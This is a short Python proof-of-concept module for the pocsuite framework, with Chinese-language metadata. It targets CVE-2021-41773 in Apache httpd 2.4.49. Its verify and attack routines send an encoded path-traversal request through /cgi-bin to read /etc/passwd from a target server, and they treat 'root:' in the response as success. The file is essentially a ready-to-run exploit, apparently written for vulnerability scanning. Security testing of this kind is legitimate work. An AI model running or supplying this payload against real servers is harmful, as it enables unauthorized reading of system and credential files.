# coding: utf-8
from pocsuite.lib.core.poc import Output
from pocsuite.poc import POCBase
from pocsuite.utils import register
import urllib2
import re

class TestPOC(POCBase):

    vulID = '''pcmgr-328131'''
    version = '1'
    vulDate = 'Wed Sep 29 2021 00:00:00 GMT+0800 (China Standard Time)'
    author = 'pcmgr'
    createDate = ''
    updateDate = 'Fri Nov 26 2021 14:44:39 GMT+0800 (China Standard Time)'
    references = '''[]'''
    name = '''Apache Httpd 2.4.49任意文件读取&远程命令执行漏洞'''
    cve = 'CVE-2021-41773'
    appPowerLink = ''
    appName = 'Apache-Web-Server'
    appVersion = '2.4.49'
    vulType = '任意文件读取'
    vulGrade = '高危'
    vulRepair = '''升级到最新版本'''
    desc = '''Apache Httpd 2.4.49存在任意文件读取漏洞，在 配置为 Require all granted 时，会造成此漏洞'''
    samples = ''''''

    def _verify(self):
        result = {}
        if self.url[-1] == '/':
            self.url = self.url[:-1]
        payload = "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
        
        target = self.url+payload

        try:
            resp = urllib2.urlopen(target)
            data = resp.read()
            if "root:" in data:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = resp.url
        except Exception as err:
            print(err)
            pass
        return self.parse_output(result)

    def parse_output(self, result):
        # parse output
        output = Output(self)
        if result:
            output.success(result)
        return output

    def _attack(self):
        return self._verify()







register(TestPOC)